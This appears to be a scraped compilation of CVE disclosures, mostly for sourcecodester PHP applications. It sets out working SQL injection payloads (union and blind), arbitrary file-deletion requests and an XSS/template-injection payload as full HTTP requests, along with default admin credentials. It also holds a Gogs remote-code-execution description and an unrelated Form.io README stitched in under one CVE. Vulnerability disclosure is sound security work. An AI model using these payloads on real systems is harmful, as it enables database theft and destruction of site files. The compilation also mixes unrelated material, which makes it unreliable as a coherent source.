Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/admin/?page=reports&date=

Vulnerability location: /ofrs/admin/?page=reports&date=, date

\[+\] Payload: /ofrs/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10--+ // Leak place ---> date

GET /ofrs/admin/?page\=reports&date\=2022\-05\-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31974: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Fire Reporting System v1.0 is vulnerable to Delete any file via /ofrs/classes/Master.php?f=delete_img.

**Online Fire Reporting System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/classes/Master.php?f=delete\_img

Vulnerability location: /ofrs/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /ofrs/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ofrs/admin/?page=system\_info
Content-Length: 62
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fofrs%2Fshell.php

The file path needs to be encoded by url

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-31973: bug_report/delet-file-1.md at main · k0xx11/bug_report

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=responses/view_response&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=responses/view\_response&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=responses/view\_response&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=responses/view\_response&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

Current database name: chat\_bot\_db,length is 11

GET /simple\_chat\_bot/admin/?page\=responses/view\_response&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 10, Content-Length: 24001 

When length (database ()) = 11, Content-Length: 24317

CVE-2022-31971: bug_report/SQLi-3.md at main · k0xx11/bug_report

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=responses/manage_response&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

Current database name: chat\_bot\_db,length is 11

GET /simple\_chat\_bot/admin/?page\=responses/manage\_response&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 10, Content-Length: 30013 

When length (database ()) = 11, Content-Length: 30708

CVE-2022-31970: bug_report/SQLi-4.md at main · k0xx11/bug_report

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=user/manage_user&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=user/manage\_user&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=user/manage\_user&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=user/manage\_user&id=-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /simple\_chat\_bot/admin/?page\=user/manage\_user&id\=\-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31969: bug_report/SQLi-1.md at main · k0xx11/bug_report

Missing input validation in internal/db/repo_editor.go in Gogs before 0.12.8 allows an attacker to execute code remotely. An unprivileged attacker (registered user) can overwrite the Git configuration in his repository. This leads to Remote Command Execution, because that configuration can contain an option such as sshCommand, which is executed when a master branch is a remote branch (using an ssh:// URI). The remote branch can also be configured by editing the Git configuration file. One can create a new file in a new repository, using the GUI, with "\" as its name, and then rename this file to .git/config with the custom configuration content (and then save it).

CVE-2021-32546: Releases · gogs/gogs

A Server-Side Template Injection (SSTI) was discovered in Form.io 2.0.0. This leads to Remote Code Execution during deletion of the default Email template URL.

 

**A combined form and API platform for Serverless applications**

Form.io is a revolutionary combined Form and API platform for Serverless applications. This repository serves as the core Form and API engine for https://form.io. This system allows you to build "serverless" data management applications using a simple drag-and-drop form builder interface. These forms can then easily be embedded within your Angular.js and React applications using the <formio> HTML element.

**Form.io is Hiring!**

If you like what you see, and would like to come and work for a cutting edge, Open Source core company, then please apply online @ https://form-talent.freshteam.com/jobs!

**Walkthrough video and tutorial**

For a walkthrough tutorial on how to use this Open Source platform to build a Serverless application, watch the video 0 to M.E.A.N in 30 minutes

**Form Building & Rendering Demo**

Here is a link to a demo of the Form Building and Form Rendering capability that can be hooked into this API platform.

http://codepen.io/travist/full/xVyMjo/

**Run with Docker Compose**

The fastest way to run this library locally is to use Docker.

*   Install Docker
    
*   Download and unzip this package to a local directory on your machine.
    
*   Open up your terminal and navigate to the unzipped folder of this library.
    
*   Type the following in your terminal
    
        npm install
        docker-compose up
        
    
*   Go to the following URL in your browser.
    
*   Use the following credentials to login.
    
    *   **email**: admin@example.com
    *   **password**: CHANGEME
*   To change the admin password.
    
    *   Once you login, click on the **Admin** resource
    *   Click **View Data**
    *   Click on the **admin@example.com** row
    *   Click **Edit Submission**
    *   Set the password field
    *   Click **Save Submission**
    *   Logout
*   Have fun!
    

**Manual Installation (Node + MongoDB)**

To get started you will first need the following installed on your machine.

*   Node.js - https://nodejs.org/en/
*   MongoDB - http://docs.mongodb.org/manual/installation/
    *   On Mac I recommend using Homebrew brew install mongodb-community
    *   On Windows, download and install the MSI package @ https://www.mongodb.org/downloads
*   You must then make sure you have MongoDB running by typing mongod in your terminal.

**Running with Node.js**

You can then download this repository, navigate to the folder in your Terminal, and then type the following.

This will walk you through the installation process. When it is done, you will have a running Form.io management application running at the following address in your browser.

The installation process will also ask if you would like to download an application. If selected, the application can be found at the following URL.

You can also see the contents of the application (for modification) within the app folder which exists inside of the folder where you downloaded this repository.

**Development**

To start server with auto restart capability for development simply run this command:

**Deploy to Hosted Form.io**

If you wish to deploy all of your forms and resources into the Form.io Hosted platform @ https://portal.form.io, you can do this by using the Form.io CLI command line tool.

    npm install -g formio-cli
    

Once you have this tool installed, you will need to follow these steps.

*   Create a new project within Form.io
*   Create an API Key within this project by going to the **Project Settings | Stage Settings | API Keys**
*   Next, you can execute the following command to deploy your local project into Hosted Form.io.

    formio deploy http://localhost:3001 https://{PROJECTNAME}.form.io --dst-key={APIKEY}
    

You will need to make sure you replace {PROJECTNAME} and {APIKEY} with your new Hosted Form.io project name (found in the API url), as well as the API key that was created in the second step above.

This will then ask you to log into the local Form.io server (which can be provided within the Admin resource), and then after it authenticates, it will export the project and deploy that project to the Form.io hosted form.

**License Change (March 8th, 2020)**

This library is now licensed under the OSL-v3 license, which is a copy-left OSI approved license. Please read the license @ https://opensource.org/licenses/OSL-3.0 for more information. Our goal for the change to OSLv3 from BSD is to ensure that appropriate Attribution is provided when creating proprietary products that leverage or extend this library.

**Help**

We will be updating the help guides found @ https://help.form.io as questions arise and also to help you get started with Form.io.

Thanks for using Form.io!

The Form.io Team.

**Security**

If you find and/or think you have found a Security issue, please quietly disclose it to security@form.io, and give us sufficient time to patch the issue before disclosing it publicly.

CVE-2020-28246: GitHub - formio/formio: A Form and Data Management Platform for Progressive Web Applications.

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

Online Car Wash Booking System v1.0 is vulnerable to Delete any file via /ocwbs/classes/Master.php?f=delete_img.

**Online Car Wash Booking System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_img

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shel.php file in the root directory

POST /ocwbs/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=system\_info
Content-Length: 46
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Focwbs%2Fshell.php

At present, the shell.php file is still in the root directory of the website, when we send a request to delete the shell.php file

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-31342: bug_report/delete-file-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/admin/incidents/view_incident.php?id=.

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/admin/incidents/view\_incident.php?id=

Vulnerability location: /rdms/admin/incidents/view\_incident.php?id=,id

\[+\] Payload: /rdms/admin/incidents/view\_incident.php?id=4%27%20and%20length(database())%20=7--+ // Leak place ---> id

Current database name: rdms\_db,length is 7

GET /rdms/admin/incidents/view\_incident.php?id\=4%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

When length (database ()) = 6, Content-Length: 860 

When length (database ()) = 7, Content-Length: 749

Tag

#windows